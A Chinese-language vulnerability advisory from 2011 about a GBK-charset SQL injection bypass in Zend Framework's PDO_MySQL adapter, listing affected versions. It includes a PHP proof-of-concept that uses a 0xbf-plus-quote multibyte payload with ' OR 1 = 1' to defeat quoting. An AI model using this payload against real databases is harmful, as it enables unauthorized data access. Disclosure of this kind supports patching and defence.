MySql”安全限制绕过漏洞

发布日期:2011-05-19
更新日期:2011-05-30

受影响系统:
Zend Zend Framework 1.11.4
Zend Zend Framework 1.11.3
Zend Zend Framework 1.10.4
Zend Zend Framework 1.10.3
Zend Zend Framework 1.10.2
不受影响系统:
Zend Zend Framework 1.11.6
Zend Zend Framework 1.10.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47919

Zend Framework (ZF) 是一个开放源代码的 PHP5 开发框架,可用于来开发 web 程序和服务。

Zend Framework在实现上存在"PDO_MySQL"安全限制绕过漏洞,远程攻击者可利用此漏洞绕过某些安全限制,利用SQL注入漏洞。

<*来源:Anthony Ferrara
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME
            FROM INFORMATION_SCHEMA.TABLES
            WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());

建议:
--------------------------------------------------------------------------------
厂商补丁:

Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwxsyj.html